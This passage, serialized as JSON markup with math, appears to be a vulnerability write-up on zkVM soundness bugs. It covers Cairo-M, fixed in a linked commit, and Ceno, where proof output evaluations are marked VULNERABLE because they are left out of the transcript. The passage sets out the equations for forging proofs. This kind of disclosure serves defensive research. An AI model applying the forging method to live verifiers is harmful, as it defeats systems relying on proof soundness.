22211,122216,122221,122278,122283,122292,122297,122306,122312,122317],{"type":25,"tag":216,"props":122196,"children":122198},{"className":122197,"style":117544},[246,2151,2189],[122199],{"type":31,"value":117547},{"type":25,"tag":216,"props":122201,"children":122203},{"className":122202},[340,2189],[122204],{"type":31,"value":3539},{"type":25,"tag":216,"props":122206,"children":122208},{"className":122207},[287,2189],[122209],{"type":31,"value":122210},"⟨",{"type":25,"tag":216,"props":122212,"children":122214},{"className":122213,"style":119071},[246,2151,2189],[122215],{"type":31,"value":119074},{"type":25,"tag":216,"props":122217,"children":122219},{"className":122218},[1864,2189],[122220],{"type":31,"value":1867},{"type":25,"tag":216,"props":122222,"children":122224},{"className":122223},[246,2189],[122225,122230],{"type":25,"tag":216,"props":122226,"children":122228},{"className":122227},[246,2151,2189],[122229],{"type":31,"value":2934},{"type":25,"tag":216,"props":122231,"children":122233},{"className":122232},[2159],[122234],{"type":25,"tag":216,"props":122235,"children":122237},{"className":122236},[298,299],[122238,122267],{"type":25,"tag":216,"props":122239,"children":122241},{"className":122240},[304],[122242,122262],{"type":25,"tag":216,"props":122243,"children":122245},{"className":122244,"style":118308},[309],[122246],{"type":25,"tag":216,"props":122247,"children":122248},{"style":112858},[122249,122253],{"type":25,"tag":216,"props":122250,"children":122252},{"className":122251,"style":5106},[319],[],{"type":25,"tag":216,"props":122254,"children":122256},{"className":122255},[2186,5111,5112,2189],[122257],{"type":25,"tag":216,"props":122258,"children":122260},{"className":122259},[246,2151,2189],[122261],{"type":31,"value":2289},{"type":25,"tag":216,"props":122263,"children":122265},{"className":122264},[408],[122266],{"type":31,"value":411},{"type":25,"tag":216,"props":122268,"children":122270},{"className":122269},[304],[122271],{"type":25,"tag":216,"props":122272,"children":122274},{"className":122273,"style":5218},[309],[122275],{"type":25,"tag":216,"props":122276,"children":122277},{},[],{"type":25,"tag":216,"props":122279,"children":122281},{"className":122280},[287,2189],[122282],{"type":31,"value":1850},{"type":25,"tag":216,"props":122284,"children":122286},{"className":122285},[246,31,2189],[122287],{"type":25,"tag":216,"props":122288,"children":122290},{"className":122289},[246,2189],[122291],{"type":31,"value":65643},{"type":25,"tag":216,"props":122293,"children":122295},{"className":122294,"style":2752},[246,2189],[122296],{"type":31,"value":7031},{"type":25,"tag":216,"props":122298,"children":122300},{"className":122299},[246,31,2189],[122301],{"type":25,"tag":216,"props":122302,"children":122304},{"className":122303},[246,2189],[122305],{"type":31,"value":7669},{"type":25,"tag":216,"props":122307,"children":122309},{"className":122308},[427,2189],[122310],{"type":31,"value":122311},")⟩",{"type":25,"tag":216,"props":122313,"children":122315},{"className":122314},[340,2189],[122316],{"type":31,"value":3539},{"type":25,"tag":216,"props":122318,"children":122320},{"className":122319,"style":119126},[246,2151,2189],[122321],{"type":31,"value":119129},{"type":25,"tag":216,"props":122323,"children":122324},{"style":360},[122325,122329],{"type":25,"tag":216,"props":122326,"children":122328},{"className":122327,"style":320},[319],[],{"type":25,"tag":216,"props":122330,"children":122332},{"className":122331,"style":370},[369],[],{"type":25,"tag":216,"props":122334,"children":122335},{"style":117571},[122336,122340],{"type":25,"tag":216,"props":122337,"children":122339},{"className":122338,"style":320},[319],[],{"type":25,"tag":216,"props":122341,"children":122343},{"className":122342},[2186,2187,2188,2189],[122344],{"type":25,"tag":216,"props":122345,"children":122347},{"className":122346},[246,2189],[122348],{"type":25,"tag":216,"props":122349,"children":122351},{"className":122350},[246,2189],[122352],{"type":31,"value":184},{"type":25,"tag":216,"props":122354,"children":122356},{"className":122355},[408],[122357],{"type":31,"value":411},{"type":25,"tag":216,"props":122359,"children":122361},{"className":122360},[304],[122362],{"type":25,"tag":216,"props":122363,"children":122366},{"className":122364,"style":122365},[309],"height:0.562em;",[122367],{"type":25,"tag":216,"props":122368,"children":122369},{},[],{"type":25,"tag":216,"props":122371,"children":122373},{"className":122372},[427,288],[],{"type":25,"tag":216,"props":122375,"children":122377},{"className":122376},[246],[122378],{"type":31,"value":179},{"type":25,"tag":38,"props":122380,"children":122381},{},[122382,122384],{"type":31,"value":122383},"The global check is then that ",{"type":25,"tag":82,"props":122385,"children":122387},{"className":122386},[212,4702],[122388],{"type":25,"tag":216,"props":122389,"children":122391},{"className":122390},[224],[122392],{"type":25,"tag":216,"props":122393,"children":122395},{"className":122394,"ariaHidden":230},[229],[122396,122437,122468],{"type":25,"tag":216,"props":122397,"children":122399},{"className":122398},[235],[122400,122404,122409,122414,122419,122424,122428,122433],{"type":25,"tag":216,"props":122401,"children":122403},{"className":122402,"style":5513},[240],[],{"type":25,"tag":216,"props":122405,"children":122407},{"className":122406},[246,2151],[122408],{"type":31,"value":121947},{"type":25,"tag":216,"props":122410,"children":122412},{"className":122411},[287],[122413],{"type":31,"value":1850},{"type":25,"tag":216,"props":122415,"children":122417},{"className":122416},[246,2151],[122418],{"type":31,"value":38},{"type":25,"tag":216,"props":122420,"children":122422},{"className":122421},[427],[122423],{"type":31,"value":1888},{"type":25,"tag":216,"props":122425,"children":122427},{"className":122426,"style":335},[257],[],{"type":25,"tag":216,"props":122429,"children":122431},{"className":122430},[340],[122432],{"type":31,"value":3539},{"type":25,"tag":216,"props":122434,"children":122436},{"className":122435,"style":335},[257],[],{"type":25,"tag":216,"props":122438,"children":122440},{"className":122439},[235],[122441,122445,122455,122459,122464],{"type":25,"tag":216,"props":122442,"children":122444},{"className":122443,"style":5513},[240],[],{"type":25,"tag":216,"props":122446,"children":122448},{"className":122447},[246,31],[122449],{"type":25,"tag":216,"props":122450,"children":122452},{"className":122451},[246],[122453],{"type":31,"value":122454},"(other terms)",{"type":25,"tag":216,"props":122456,"children":122458},{"className":122457,"style":258},[257],[],{"type":25,"tag":216,"props":122460,"children":122462},{"className":122461},[263],[122463],{"type":31,"value":266},{"type":25,"tag":216,"props":122465,"children":122467},{"className":122466,"style":258},[257],[],{"type":25,"tag":216,"props":122469,"children":122471},{"className":122470},[235],[122472,122476],{"type":25,"tag":216,"props":122473,"children":122475},{"className":122474,"style":5293},[240],[],{"type":25,"tag":216,"props":122477,"children":122479},{"className":122478},[246],[122480],{"type":31,"value":1882},{"type":25,"tag":38,"props":122482,"children":122483},{},[122484],{"type":31,"value":122485},"With challenges fixed, this is a rational equation in public data. This is not linear, but still algebraically solvable.",{"type":25,"tag":38,"props":122487,"children":122488},{},[122489],{"type":31,"value":122490},"Public-data coordinates participate in verification relations through extension-field arithmetic (including extension-valued public-memory entries), so the forged-parameter search is a coupled extension-field system.",{"type":25,"tag":38,"props":122492,"children":122493},{},[122494,122498,122500],{"type":25,"tag":9273,"props":122495,"children":122496},{},[122497],{"type":31,"value":120693},{"type":31,"value":122499}," Fixed on October 31, 2025 via ",{"type":25,"tag":162,"props":122501,"children":122504},{"href":122502,"rel":122503},"https://github.com/kkrt-labs/cairo-m/pull/352/commits/92b6740937e904e0002e7ee099fec357127c1d16",[166],[122505],{"type":31,"value":122506},"commit 92b6740",{"type":25,"tag":22753,"props":122508,"children":122509},{},[],{"type":25,"tag":606,"props":122511,"children":122513},{"id":122512},"ceno-scroll",[122514],{"type":31,"value":122515},"Ceno (Scroll)",{"type":25,"tag":38,"props":122517,"children":122518},{},[122519],{"type":31,"value":122520},"Ceno is a zkVM by Scroll, using GKR with a tower sumcheck structure.",{"type":25,"tag":38,"props":122522,"children":122523},{},[122524,122526,122531],{"type":31,"value":122525},"Ceno splits verification into ",{"type":25,"tag":9273,"props":122527,"children":122528},{},[122529],{"type":31,"value":122530},"chips",{"type":31,"value":122532},", with one per opcode or lookup table. Each chip proves its constraints independently.",{"type":25,"tag":38,"props":122534,"children":122535},{},[122536,122538,122543],{"type":31,"value":122537},"Many per-record values (reads, writes, lookups) are batched into a binary tree structure. Each layer folds pairs of values with random challenges; this is the ",{"type":25,"tag":9273,"props":122539,"children":122540},{},[122541],{"type":31,"value":122542},"tower sumcheck",{"type":31,"value":179},{"type":25,"tag":38,"props":122545,"children":122546},{},[122547],{"type":31,"value":122548},"All read records must match all write records (plus initial/final state). This is checked via a multiset equality, this time using a product instead of logup:",{"type":25,"tag":38,"props":122550,"children":122551},{},[122552],{"type":25,"tag":82,"props":122553,"children":122555},{"className":122554},[212,4702],[122556],{"type":25,"tag":216,"props":122557,"children":122559},{"className":122558},[224],[122560],{"type":25,"tag":216,"props":122561,"children":122563},{"className":122562,"ariaHidden":230},[229],[122564,122738,122911],{"type":25,"tag":216,"props":122565,"children":122567},{"className":122566},[235],[122568,122572,122630,122634,122643,122648,122658,122663,122725,122729,122734],{"type":25,"tag":216,"props":122569,"children":122571},{"className":122570,"style":96960},[240],[],{"type":25,"tag":216,"props":122573,"children":122575},{"className":122574},[1841],[122576,122582],{"type":25,"tag":216,"props":122577,"children":122579},{"className":122578,"style":25584},[1841,4048,25583],[122580],{"type":31,"value":122581},"∏",{"type":25,"tag":216,"props":122583,"children":122585},{"className":122584},[2159],[122586],{"type":25,"tag":216,"props":122587,"children":122589},{"className":122588},[298,299],[122590,122619],{"type":25,"tag":216,"props":122591,"children":122593},{"className":122592},[304],[122594,122614],{"type":25,"tag":216,"props":122595,"children":122597},{"className":122596,"style":118191},[309],[122598],{"type":25,"tag":216,"props":122599,"children":122600},{"style":25607},[122601,122605],{"type":25,"tag":216,"props":122602,"children":122604},{"className":122603,"style":2181},[319],[],{"type":25,"tag":216,"props":122606,"children":122608},{"className":122607},[2186,2187,2188,2189],[122609],{"type":25,"tag":216,"props":122610,"children":122612},{"className":122611},[246,2151,2189],[122613],{"type":31,"value":2289},{"type":25,"tag":216,"props":122615,"children":122617},{"className":122616},[408],[122618],{"type":31,"value":411},{"type":25,"tag":216,"props":122620,"children":122622},{"className":122621},[304],[122623],{"type":25,"tag":216,"props":122624,"children":122626},{"className":122625,"style":118471},[309],[122627],{"type":25,"tag":216,"props":122628,"children":122629},{},[],{"type":25,"tag":216,"props":122631,"children":122633},{"className":122632,"style":1871},[257],[],{"type":25,"tag":216,"props":122635,"children":122637},{"className":122636},[246,31],[122638],{"type":25,"tag":216,"props":122639,"children":122641},{"className":122640},[246],[122642],{"type":31,"value":97829},{"type":25,"tag":216,"props":122644,"children":122646},{"className":122645,"style":2752},[246],[122647],{"type":31,"value":7031},{"type":25,"tag":216,"props":122649,"children":122651},{"className":122650},[246,31],[122652],{"type":25,"tag":216,"props":122653,"children":122655},{"className":122654},[246],[122656],{"type":31,"value":122657},"out",{"type":25,"tag":216,"props":122659,"children":122661},{"className":122660,"style":2752},[246],[122662],{"type":31,"value":7031},{"type":25,"tag":216,"props":122664,"children":122666},{"className":122665},[246],[122667,122677],{"type":25,"tag":216,"props":122668,"children":122670},{"className":122669},[246,31],[122671],{"type":25,"tag":216,"props":122672,"children":122674},{"className":122673},[246],[122675],{"type":31,"value":122676},"evals",{"type":25,"tag":216,"props":122678,"children":122680},{"className":122679},[2159],[122681],{"type":25,"tag":216,"props":122682,"children":122684},{"className":122683},[298,299],[122685,122714],{"type":25,"tag":216,"props":122686,"children":122688},{"className":122687},[304],[122689,122709],{"type":25,"tag":216,"props":122690,"children":122692},{"className":122691,"style":2270},[309],[122693],{"type":25,"tag":216,"props":122694,"children":122695},{"style":118114},[122696,122700],{"type":25,"tag":216,"props":122697,"children":122699},{"className":122698,"style":2181},[319],[],{"type":25,"tag":216,"props":122701,"children":122703},{"className":122702},[2186,2187,2188,2189],[122704],{"type":25,"tag":216,"props":122705,"children":122707},{"className":122706},[246,2151,2189],[122708],{"type":31,"value":2289},{"type":25,"tag":216,"props":122710,"children":122712},{"className":122711},[408],[122713],{"type":31,"value":411},{"type":25,"tag":216,"props":122715,"children":122717},{"className":122716},[304],[122718],{"type":25,"tag":216,"props":122719,"children":122721},{"className":122720,"style":2209},[309],[122722],{"type":25,"tag":216,"props":122723,"children":122724},{},[],{"type":25,"tag":216,"props":122726,"children":122728},{"className":122727,"style":258},[257],[],{"type":25,"tag":216,"props":122730,"children":122732},{"className":122731},[263],[122733],{"type":31,"value":266},{"type":25,"tag":216,"props":122735,"children":122737},{"className":122736,"style":258},[257],[],{"type":25,"tag":216,"props":122739,"children":122741},{"className":122740},[235],[122742,122747,122804,122808,122817,122822,122831,122836,122898,122902,122907],{"type":25,"tag":216,"props":122743,"children":122746},{"className":122744,"style":122745},[240],"height:1.1858em;vertical-align:-0.4358em;",[],{"type":25,"tag":216,"props":122748,"children":122750},{"className":122749},[1841],[122751,122756],{"type":25,"tag":216,"props":122752,"children":122754},{"className":122753,"style":25584},[1841,4048,25583],[122755],{"type":31,"value":122581},{"type":25,"tag":216,"props":122757,"children":122759},{"className":122758},[2159],[122760],{"type":25,"tag":216,"props":122761,"children":122763},{"className":122762},[298,299],[122764,122793],{"type":25,"tag":216,"props":122765,"children":122767},{"className":122766},[304],[122768,122788],{"type":25,"tag":216,"props":122769,"children":122771},{"className":122770,"style":118191},[309],[122772],{"type":25,"tag":216,"props":122773,"children":122774},{"style":25607},[122775,122779],{"type":25,"tag":216,"props":122776,"children":122778},{"className":122777,"style":2181},[319],[],{"type":25,"tag":216,"props":122780,"children":122782},{"className":122781},[2186,2187,2188,2189],[122783],{"type":25,"tag":216,"props":122784,"children":122786},{"className":122785,"style":118207},[246,2151,2189],[122787],{"type":31,"value":12609},{"type":25,"tag":216,"props":122789,"children":122791},{"className":122790},[408],[122792],{"type":31,"value":411},{"type":25,"tag":216,"props":122794,"children":122796},{"className":122795},[304],[122797],{"type":25,"tag":216,"props":122798,"children":122800},{"className":122799,"style":118222},[309],[122801],{"type":25,"tag":216,"props":122802,"children":122803},{},[],{"type":25,"tag":216,"props":122805,"children":122807},{"className":122806,"style":1871},[257],[],{"type":25,"tag":216,"props":122809,"children":122811},{"className":122810},[246,31],[122812],{"type":25,"tag":216,"props":122813,"children":122815},{"className":122814},[246],[122816],{"type":31,"value":2470},{"type":25,"tag":216,"props":122818,"children":122820},{"className":122819,"style":2752},[246],[122821],{"type":31,"value":7031},{"type":25,"tag":216,"props":122823,"children":122825},{"className":122824},[246,31],[122826],{"type":25,"tag":216,"props":122827,"children":122829},{"className":122828},[246],[122830],{"type":31,"value":122657},{"type":25,"tag":216,"props":122832,"children":122834},{"className":122833,"style":2752},[246],[122835],{"type":31,"value":7031},{"type":25,"tag":216,"props":122837,"children":122839},{"className":122838},[246],[122840,122849],{"type":25,"tag":216,"props":122841,"children":122843},{"className":122842},[246,31],[122844],{"type":25,"tag":216,"props":122845,"children":122847},{"className":122846},[246],[122848],{"type":31,"value":122676},{"type":25,"tag":216,"props":122850,"children":122852},{"className":122851},[2159],[122853],{"type":25,"tag":216,"props":122854,"children":122856},{"className":122855},[298,299],[122857,122886],{"type":25,"tag":216,"props":122858,"children":122860},{"className":122859},[304],[122861,122881],{"type":25,"tag":216,"props":122862,"children":122864},{"className":122863,"style":2270},[309],[122865],{"type":25,"tag":216,"props":122866,"children":122867},{"style":118114},[122868,122872],{"type":25,"tag":216,"props":122869,"children":122871},{"className":122870,"style":2181},[319],[],{"type":25,"tag":216,"props":122873,"children":122875},{"className":122874},[2186,2187,2188,2189],[122876],{"type":25,"tag":216,"props":122877,"children":122879},{"className":122878,"style":118207},[246,2151,2189],[122880],{"type":31,"value":12609},{"type":25,"tag":216,"props":122882,"children":122884},{"className":122883},[408],[122885],{"type":31,"value":411},{"type":25,"tag":216,"props":122887,"children":122889},{"className":122888},[304],[122890],{"type":25,"tag":216,"props":122891,"children":122894},{"className":122892,"style":122893},[309],"height:0.2861em;",[122895],{"type":25,"tag":216,"props":122896,"children":122897},{},[],{"type":25,"tag":216,"props":122899,"children":122901},{"className":122900,"style":335},[257],[],{"type":25,"tag":216,"props":122903,"children":122905},{"className":122904},[340],[122906],{"type":31,"value":343},{"type":25,"tag":216,"props":122908,"children":122910},{"className":122909,"style":335},[257],[],{"type":25,"tag":216,"props":122912,"children":122914},{"className":122913},[235],[122915,122919,122924,122934],{"type":25,"tag":216,"props":122916,"children":122918},{"className":122917,"style":5513},[240],[],{"type":25,"tag":216,"props":122920,"children":122922},{"className":122921},[287],[122923],{"type":31,"value":1850},{"type":25,"tag":216,"props":122925,"children":122927},{"className":122926},[246,31],[122928],{"type":25,"tag":216,"props":122929,"children":122931},{"className":122930},[246],[122932],{"type":31,"value":122933},"state factors",{"type":25,"tag":216,"props":122935,"children":122937},{"className":122936},[427],[122938],{"type":31,"value":1888},{"type":25,"tag":38,"props":122940,"children":122941},{},[122942],{"type":25,"tag":9273,"props":122943,"children":122944},{},[122945],{"type":31,"value":119399},{"type":25,"tag":206,"props":122947,"children":122949},{"code":122948},"ZKVMChipProof {\n    r_out_evals: [[FieldElement]],   // \u003C- VULNERABLE\n    w_out_evals: [[FieldElement]],   // \u003C- VULNERABLE\n    lk_out_evals: [[FieldElement]],  // \u003C- VULNERABLE\n    tower_proof: [...],\n    gkr_iop_proof: [...],\n}\n",[122950],{"type":25,"tag":82,"props":122951,"children":122952},{"__ignoreMap":7},[122953],{"type":31,"value":122948},{"type":25,"tag":38,"props":122955,"children":122956},{},[122957,122963,122964,122970,122971,122977],{"type":25,"tag":82,"props":122958,"children":122960},{"className":122959},[],[122961],{"type":31,"value":122962},"r_out_evals",{"type":31,"value":7026},{"type":25,"tag":82,"props":122965,"children":122967},{"className":122966},[],[122968],{"type":31,"value":122969},"w_out_evals",{"type":31,"value":10439},{"type":25,"tag":82,"props":122972,"children":122974},{"className":122973},[],[122975],{"type":31,"value":122976},"lk_out_evals",{"type":31,"value":122978}," are used to initialize the tower sumcheck claim, but they're never absorbed into the transcript. This leaves us with two equations:",{"type":25,"tag":6711,"props":122980,"children":122981},{},[122982],{"type":25,"tag":2043,"props":122983,"children":122984},{},[122985,122990,122992,122998],{"type":25,"tag":9273,"props":122986,"children":122987},{},[122988],{"type":31,"value":122989},"GKR/Tower equation",{"type":31,"value":122991}," (linear in ",{"type":25,"tag":82,"props":122993,"children":122995},{"className":122994},[],[122996],{"type":31,"value":122997},"out_evals",{"type":31,"value":27903},{"type":25,"tag":38,"props":123000,"children":123001},{},[123002,123004],{"type":31,"value":123003},"The tower sumcheck claim is ",{"type":25,"tag":82,"props":123005,"children":123007},{"className":123006},[212,4702],[123008],{"type":25,"tag":216,"props":123009,"children":123011},{"className":123010},[224],[123012],{"type":25,"tag":216,"props":123013,"children":123015},{"className":123014,"ariaHidden":230},[229],[123016,123047,123172],{"type":25,"tag":216,"props":123017,"children":123019},{"className":123018},[235],[123020,123024,123034,123038,123043],{"type":25,"tag":216,"props":123021,"children":123023},{"className":123022,"style":96933},[240],[],{"type":25,"tag":216,"props":123025,"children":123027},{"className":123026},[246,31],[123028],{"type":25,"tag":216,"props":123029,"children":123031},{"className":123030},[246],[123032],{"type":31,"value":123033},"claim",{"type":25,"tag":216,"props":123035,"children":123037},{"className":123036,"style":258},[257],[],{"type":25,"tag":216,"props":123039,"children":123041},{"className":123040},[263],[123042],{"type":31,"value":266},{"type":25,"tag":216,"props":123044,"children":123046},{"className":123045,"style":258},[257],[],{"type":25,"tag":216,"props":123048,"children":123050},{"className":123049},[235],[123051,123056,123113,123117,123159,123163,123168],{"type":25,"tag":216,"props":123052,"children":123055},{"className":123053,"style":123054},[240],"height:1.2605em;vertical-align:-0.4358em;",[],{"type":25,"tag":216,"props":123057,"children":123059},{"className":123058},[1841],[123060,123065],{"type":25,"tag":216,"props":123061,"children":123063},{"className":123062,"style":25584},[1841,4048,25583],[123064],{"type":31,"value":4052},{"type":25,"tag":216,"props":123066,"children":123068},{"className":123067},[2159],[123069],{"type":25,"tag":216,"props":123070,"children":123072},{"className":123071},[298,299],[123073,123102],{"type":25,"tag":216,"props":123074,"children":123076},{"className":123075},[304],[123077,123097],{"type":25,"tag":216,"props":123078,"children":123080},{"className":123079,"style":118191},[309],[123081],{"type":25,"tag":216,"props":123082,"children":123083},{"style":25607},[123084,123088],{"type":25,"tag":216,"props":123085,"children":123087},{"className":123086,"style":2181},[319],[],{"type":25,"tag":216,"props":123089,"children":123091},{"className":123090},[2186,2187,2188,2189],[123092],{"type":25,"tag":216,"props":123093,"children":123095},{"className":123094,"style":118207},[246,2151,2189],[123096],{"type":31,"value":12609},{"type":25,"tag":216,"props":123098,"children":123100},{"className":123099},[408],[123101],{"type":31,"value":411},{"type":25,"tag":216,"props":123103,"children":123105},{"className":123104},[304],[123106],{"type":25,"tag":216,"props":123107,"children":123109},{"className":123108,"style":118222},[309],[123110],{"type":25,"tag":216,"props":123111,"children":123112},{},[],{"type":25,"tag":216,"props":123114,"children":123116},{"className":123115,"style":1871},[257],[],{"type":25,"tag":216,"props":123118,"children":123120},{"className":123119},[246],[123121,123126],{"type":25,"tag":216,"props":123122,"children":123124},{"className":123123,"style":119071},[246,2151],[123125],{"type":31,"value":119074},{"type":25,"tag":216,"props":123127,"children":123129},{"className":123128},[2159],[123130],{"type":25,"tag":216,"props":123131,"children":123133},{"className":123132},[298],[123134],{"type":25,"tag":216,"props":123135,"children":123137},{"className":123136},[304],[123138],{"type":25,"tag":216,"props":123139,"children":123142},{"className":123140,"style":123141},[309],"height:0.8247em;",[123143],{"type":25,"tag":216,"props":123144,"children":123145},{"style":6104},[123146,123150],{"type":25,"tag":216,"props":123147,"children":123149},{"className":123148,"style":2181},[319],[],{"type":25,"tag":216,"props":123151,"children":123153},{"className":123152},[2186,2187,2188,2189],[123154],{"type":25,"tag":216,"props":123155,"children":123157},{"className":123156,"style":118207},[246,2151,2189],[123158],{"type":31,"value":12609},{"type":25,"tag":216,"props":123160,"children":123162},{"className":123161,"style":335},[257],[],{"type":25,"tag":216,"props":123164,"children":123166},{"className":123165},[340],[123167],{"type":31,"value":343},{"type":25,"tag":216,"props":123169,"children":123171},{"className":123170,"style":335},[257],[],{"type":25,"tag":216,"props":123173,"children":123175},{"className":123174},[235],[123176,123180,123189,123194],{"type":25,"tag":216,"props":123177,"children":123179},{"className":123178,"style":241},[240],[],{"type":25,"tag":216,"props":123181,"children":123183},{"className":123182},[246,31],[123184],{"type":25,"tag":216,"props":123185,"children":123187},{"className":123186},[246],[123188],{"type":31,"value":122657},{"type":25,"tag":216,"props":123190,"children":123192},{"className":123191,"style":2752},[246],[123193],{"type":31,"value":7031},{"type":25,"tag":216,"props":123195,"children":123197},{"className":123196},[246],[123198,123207],{"type":25,"tag":216,"props":123199,"children":123201},{"className":123200},[246,31],[123202],{"type":25,"tag":216,"props":123203,"children":123205},{"className":123204},[246],[123206],{"type":31,"value":122676},{"type":25,"tag":216,"props":123208,"children":123210},{"className":123209},[2159],[123211],{"type":25,"tag":216,"props":123212,"children":123214},{"className":123213},[298,299],[123215,123244],{"type":25,"tag":216,"props":123216,"children":123218},{"className":123217},[304],[123219,123239],{"type":25,"tag":216,"props":123220,"children":123222},{"className":123221,"style":2270},[309],[123223],{"type":25,"tag":216,"props":123224,"children":123225},{"style":118114},[123226,123230],{"type":25,"tag":216,"props":123227,"children":123229},{"className":123228,"style":2181},[319],[],{"type":25,"tag":216,"props":123231,"children":123233},{"className":123232},[2186,2187,2188,2189],[123234],{"type":25,"tag":216,"props":123235,"children":123237},{"className":123236,"style":118207},[246,2151,2189],[123238],{"type":31,"value":12609},{"type":25,"tag":216,"props":123240,"children":123242},{"className":123241},[408],[123243],{"type":31,"value":411},{"type":25,"tag":216,"props":123245,"children":123247},{"className":123246},[304],[123248],{"type":25,"tag":216,"props":123249,"children":123251},{"className":123250,"style":122893},[309],[123252],{"type":25,"tag":216,"props":123253,"children":123254},{},[],{"type":25,"tag":38,"props":123256,"children":123257},{},[123258,123260,123265],{"type":31,"value":123259},"This check is linear in ",{"type":25,"tag":82,"props":123261,"children":123263},{"className":123262},[],[123264],{"type":31,"value":122997},{"type":31,"value":179},{"type":25,"tag":6711,"props":123267,"children":123268},{"start":6769},[123269],{"type":25,"tag":2043,"props":123270,"children":123271},{},[123272,123277,123279,123284],{"type":25,"tag":9273,"props":123273,"children":123274},{},[123275],{"type":31,"value":123276},"rw-product consistency",{"type":31,"value":123278}," (bilinear in ",{"type":25,"tag":82,"props":123280,"children":123282},{"className":123281},[],[123283],{"type":31,"value":122997},{"type":31,"value":27903},{"type":25,"tag":38,"props":123286,"children":123287},{},[123288],{"type":25,"tag":82,"props":123289,"children":123291},{"className":123290},[212,4702],[123292],{"type":25,"tag":216,"props":123293,"children":123295},{"className":123294},[224],[123296],{"type":25,"tag":216,"props":123297,"children":123299},{"className":123298,"ariaHidden":230},[229],[123300,123471,123642],{"type":25,"tag":216,"props":123301,"children":123303},{"className":123302},[235],[123304,123308,123365,123369,123378,123383,123392,123397,123458,123462,123467],{"type":25,"tag":216,"props":123305,"children":123307},{"className":123306,"style":96960},[240],[],{"type":25,"tag":216,"props":123309,"children":123311},{"className":123310},[1841],[123312,123317],{"type":25,"tag":216,"props":123313,"children":123315},{"className":123314,"style":25584},[1841,4048,25583],[123316],{"type":31,"value":122581},{"type":25,"tag":216,"props":123318,"children":123320},{"className":123319},[2159],[123321],{"type":25,"tag":216,"props":123322,"children":123324},{"className":123323},[298,299],[123325,123354],{"type":25,"tag":216,"props":123326,"children":123328},{"className":123327},[304],[123329,123349],{"type":25,"tag":216,"props":123330,"children":123332},{"className":123331,"style":118191},[309],[123333],{"type":25,"tag":216,"props":123334,"children":123335},{"style":25607},[123336,123340],{"type":25,"tag":216,"props":123337,"children":123339},{"className":123338,"style":2181},[319],[],{"type":25,"tag":216,"props":123341,"children":123343},{"className":123342},[2186,2187,2188,2189],[123344],{"type":25,"tag":216,"props":123345,"children":123347},{"className":123346},[246,2151,2189],[123348],{"type":31,"value":2289},{"type":25,"tag":216,"props":123350,"children":123352},{"className":123351},[408],[123353],{"type":31,"value":411},{"type":25,"tag":216,"props":123355,"children":123357},{"className":123356},[304],[123358],{"type":25,"tag":216,"props":123359,"children":123361},{"className":123360,"style":118471},[309],[123362],{"type":25,"tag":216,"props":123363,"children":123364},{},[],{"type":25,"tag":216,"props":123366,"children":123368},{"className":123367,"style":1871},[257],[],{"type":25,"tag":216,"props":123370,"children":123372},{"className":123371},[246,31],[123373],{"type":25,"tag":216,"props":123374,"children":123376},{"className":123375},[246],[123377],{"type":31,"value":97829},{"type":25,"tag":216,"props":123379,"children":123381},{"className":123380,"style":2752},[246],[123382],{"type":31,"value":7031},{"type":25,"tag":216,"props":123384,"children":123386},{"className":123385},[246,31],[123387],{"type":25,"tag":216,"props":123388,"children":123390},{"className":123389},[246],[123391],{"type":31,"value":122657},{"type":25,"tag":216,"props":123393,"children":123395},{"className":123394,"style":2752},[246],[123396],{"type":31,"value":7031},{"type":25,"tag":216,"props":123398,"children":123400},{"className":123399},[246],[123401,123410],{"type":25,"tag":216,"props":123402,"children":123404},{"className":123403},[246,31],[123405],{"type":25,"tag":216,"props":123406,"children":123408},{"className":123407},[246],[123409],{"type":31,"value":122676},{"type":25,"tag":216,"props":123411,"children":123413},{"className":123412},[2159],[123414],{"type":25,"tag":216,"props":123415,"children":123417},{"className":123416},[298,299],[123418,123447],{"type":25,"tag":216,"props":123419,"children":123421},{"className":123420},[304],[123422,123442],{"type":25,"tag":216,"props":123423,"children":123425},{"className":123424,"style":2270},[309],[123426],{"type":25,"tag":216,"props":123427,"children":123428},{"style":118114},[123429,123433],{"type":25,"tag":216,"props":123430,"children":123432},{"className":123431,"style":2181},[319],[],{"type":25,"tag":216,"props":123434,"children":123436},{"className":123435},[2186,2187,2188,2189],[123437],{"type":25,"tag":216,"props":123438,"children":123440},{"className":123439},[246,2151,2189],[123441],{"type":31,"value":2289},{"type":25,"tag":216,"props":123443,"children":123445},{"className":123444},[408],[123446],{"type":31,"value":411},{"type":25,"tag":216,"props":123448,"children":123450},{"className":123449},[304],[123451],{"type":25,"tag":216,"props":123452,"children":123454},{"className":123453,"style":2209},[309],[123455],{"type":25,"tag":216,"props":123456,"children":123457},{},[],{"type":25,"tag":216,"props":123459,"children":123461},{"className":123460,"style":258},[257],[],{"type":25,"tag":216,"props":123463,"children":123465},{"className":123464},[263],[123466],{"type":31,"value":266},{"type":25,"tag":216,"props":123468,"children":123470},{"className":123469,"style":258},[257],[],{"type":25,"tag":216,"props":123472,"children":123474},{"className":123473},[235],[123475,123479,123536,123540,123549,123554,123563,123568,123629,123633,123638],{"type":25,"tag":216,"props":123476,"children":123478},{"className":123477,"style":122745},[240],[],{"type":25,"tag":216,"props":123480,"children":123482},{"className":123481},[1841],[123483,123488],{"type":25,"tag":216,"props":123484,"children":123486},{"className":123485,"style":25584},[1841,4048,25583],[123487],{"type":31,"value":122581},{"type":25,"tag":216,"props":123489,"children":123491},{"className":123490},[2159],[123492],{"type":25,"tag":216,"props":123493,"children":123495},{"className":123494},[298,299],[123496,123525],{"type":25,"tag":216,"props":123497,"children":123499},{"className":123498},[304],[123500,123520],{"type":25,"tag":216,"props":123501,"children":123503},{"className":123502,"style":118191},[309],[123504],{"type":25,"tag":216,"props":123505,"children":123506},{"style":25607},[123507,123511],{"type":25,"tag":216,"props":123508,"children":123510},{"className":123509,"style":2181},[319],[],{"type":25,"tag":216,"props":123512,"children":123514},{"className":123513},[2186,2187,2188,2189],[123515],{"type":25,"tag":216,"props":123516,"children":123518},{"className":123517,"style":118207},[246,2151,2189],[123519],{"type":31,"value":12609},{"type":25,"tag":216,"props":123521,"children":123523},{"className":123522},[408],[123524],{"type":31,"value":411},{"type":25,"tag":216,"props":123526,"children":123528},{"className":123527},[304],[123529],{"type":25,"tag":216,"props":123530,"children":123532},{"className":123531,"style":118222},[309],[123533],{"type":25,"tag":216,"props":123534,"children":123535},{},[],{"type":25,"tag":216,"props":123537,"children":123539},{"className":123538,"style":1871},[257],[],{"type":25,"tag":216,"props":123541,"children":123543},{"className":123542},[246,31],[123544],{"type":25,"tag":216,"props":123545,"children":123547},{"className":123546},[246],[123548],{"type":31,"value":2470},{"type":25,"tag":216,"props":123550,"children":12